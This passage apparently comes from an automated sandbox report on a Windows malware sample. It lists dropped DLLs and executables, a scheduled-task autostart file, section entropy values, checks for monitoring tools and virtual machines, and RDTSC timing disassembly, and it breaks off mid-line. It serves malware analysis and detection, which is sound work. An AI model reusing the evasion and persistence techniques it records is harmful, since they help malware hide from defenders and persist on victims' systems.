Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0E40 push 7F4B0002h; ret 13_2_7F4B0E4F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1140 push 7F4B0002h; ret 13_2_7F4B114F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1440 push 7F4B0002h; ret 13_2_7F4B144F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1740 push 7F4B0002h; ret 13_2_7F4B174F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1A40 push 7F4B0002h; ret 13_2_7F4B1A4F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1D40 push 7F4B0002h; ret 13_2_7F4B1D4F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2040 push 7F4B0002h; ret 13_2_7F4B204F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2340 push 7F4B0002h; ret 13_2_7F4B234F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2850 push 7F4B0002h; ret 13_2_7F4B285F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2550 push 7F4B0002h; ret 13_2_7F4B255F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2250 push 7F4B0002h; ret 13_2_7F4B225F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0A50 push 7F4B0002h; ret 13_2_7F4B0A5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0850 push edx; mov dword ptr [esp], edx 13_2_7F4B0625
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0850 push edx; mov dword ptr [esp], esi 13_2_7F4B0722
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0850 push ebx; mov dword ptr [esp], ebx 13_2_7F4B0756
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0D50 push 7F4B0002h; ret 13_2_7F4B0D5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1050 push 7F4B0002h; ret 13_2_7F4B105F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1350 push 7F4B0002h; ret 13_2_7F4B135F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1650 push 7F4B0002h; ret 13_2_7F4B165F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1950 push 7F4B0002h; ret 13_2_7F4B195F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1C50 push 7F4B0002h; ret 13_2_7F4B1C5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B1F50 push 7F4B0002h; ret 13_2_7F4B1F5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2760 push 7F4B0002h; ret 13_2_7F4B276F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0C60 push 7F4B0002h; ret 13_2_7F4B0C6F
Source: Wf9qnVcbi8.exe Static PE information: section name: entropy: 7.995078111537249
Source: Wf9qnVcbi8.exe Static PE information: section name: entropy: 7.98138192860846
Source: Wf9qnVcbi8.exe Static PE information: section name: entropy: 7.951394948256141
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: entropy: 7.982608481536758
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: lwthcuux entropy: 7.955600116477208
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.982608481536758
Source: amadka[1].exe.0.dr Static PE information: section name: lwthcuux entropy: 7.955600116477208
Source: explorti.exe.7.dr Static PE information: section name: entropy: 7.982608481536758
Source: explorti.exe.7.dr Static PE information: section name: lwthcuux entropy: 7.955600116477208
Source: random[1].exe.12.dr Static PE information: section name: entropy: 7.995078111537249
Source: random[1].exe.12.dr Static PE information: section name: entropy: 7.98138192860846
Source: random[1].exe.12.dr Static PE information: section name: entropy: 7.951394948256141
Source: 528307a0ac.exe.12.dr Static PE information: section name: entropy: 7.995078111537249
Source: 528307a0ac.exe.12.dr Static PE information: section name: entropy: 7.98138192860846
Source: 528307a0ac.exe.12.dr Static PE information: section name: entropy: 7.951394948256141
Drops PE files
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C5A55F0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C91894 second address: C91899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C816F3 second address: C81727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007FC9F53DFD56h 0x0000000c popad 0x0000000d jnp 00007FC9F53DFD72h 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C90B80 second address: C90B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C91164 second address: C91168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C91168 second address: C9117D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC9F53C6A76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007FC9F53C6A76h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C9117D second address: C91183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C937A5 second address: C937A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C938AF second address: C938B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C938B7 second address: C938DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC9F53C6A89h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C938DA second address: C93901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FC9F53DFD56h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93901 second address: C93907 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93907 second address: C9393D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC9F53DFD5Ch 0x00000008 jne 00007FC9F53DFD56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jng 00007FC9F53DFD6Bh 0x00000018 jnl 00007FC9F53DFD65h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C9393D second address: C939A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FC9F53C6A78h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push 00000003h 0x00000024 mov cx, 032Dh 0x00000028 push 00000000h 0x0000002a cld 0x0000002b mov edx, eax 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FC9F53C6A78h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 sub dword ptr [ebp+122D1BCFh], edi 0x0000004f call 00007FC9F53C6A79h 0x00000054 pushad 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C939A8 second address: C939C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC9F53DFD5Eh 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C939C3 second address: C939CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C939CD second address: C93A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FC9F53DFD69h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push edi 0x00000012 push ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC9F53DFD65h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93A13 second address: C93A1D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC9F53C6A7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93A1D second address: C93A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FC9F53DFD58h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 lea ebx, dword ptr [ebp+124586F0h] 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93A55 second address: C93A5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93A5B second address: C93A62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93A62 second address: C93A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a je 00007FC9F53C6A76h 0x00000010 pop esi 0x00000011 jo 00007FC9F53C6A7Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93AC3 second address: C93AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93AC7 second address: C93ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93ACD second address: C93AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD65h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93AE6 second address: C93B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push edx 0x0000000c jmp 00007FC9F53C6A84h 0x00000011 pop ecx 0x00000012 jmp 00007FC9F53C6A7Fh 0x00000017 push 00000000h 0x00000019 mov cl, FEh 0x0000001b push 8C2FD6F5h 0x00000020 pushad 0x00000021 jmp 00007FC9F53C6A84h 0x00000026 pushad 0x00000027 jmp 00007FC9F53C6A89h 0x0000002c jnc 00007FC9F53C6A76h 0x00000032 popad 0x00000033 popad 0x00000034 add dword ptr [esp], 73D0298Bh 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007FC9F53C6A78h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 00000015h 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 mov esi, 6B0E3D00h 0x0000005a clc 0x0000005b push 00000003h 0x0000005d mov dl, 80h 0x0000005f push 00000000h 0x00000061 movsx edx, cx 0x00000064 push 00000003h 0x00000066 xor dx, 601Ch 0x0000006b push 6E354F96h 0x00000070 push edi 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 popad 0x00000075 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93B9A second address: C93B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93B9E second address: C93C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 add dword ptr [esp], 51CAB06Ah 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FC9F53C6A78h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 jmp 00007FC9F53C6A87h 0x0000002d sub ecx, dword ptr [ebp+122D362Fh] 0x00000033 lea ebx, dword ptr [ebp+124586F9h] 0x00000039 mov dx, di 0x0000003c xchg eax, ebx 0x0000003d jmp 00007FC9F53C6A7Fh 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 je 00007FC9F53C6A76h 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93C47 second address: C93C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC9F53DFD56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93C51 second address: C93C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93C55 second address: C93CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jnl 00007FC9F53DFD5Ch 0x00000011 mov edx, dword ptr [ebp+122D3643h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007FC9F53DFD58h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 mov ecx, dword ptr [ebp+122D388Bh] 0x00000039 cmc 0x0000003a call 00007FC9F53DFD59h 0x0000003f pushad 0x00000040 push esi 0x00000041 push edi 0x00000042 pop edi 0x00000043 pop esi 0x00000044 pushad 0x00000045 ja 00007FC9F53DFD56h 0x0000004b je 00007FC9F53DFD56h 0x00000051 popad 0x00000052 popad 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93CBE second address: C93CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93CC3 second address: C93D6C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC9F53DFD58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 push ebx 0x00000014 jbe 00007FC9F53DFD56h 0x0000001a pop ebx 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e js 00007FC9F53DFD72h 0x00000024 jg 00007FC9F53DFD6Ch 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e jmp 00007FC9F53DFD5Ah 0x00000033 pop eax 0x00000034 push 00000003h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007FC9F53DFD58h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 mov edi, dword ptr [ebp+122D3907h] 0x00000056 mov dword 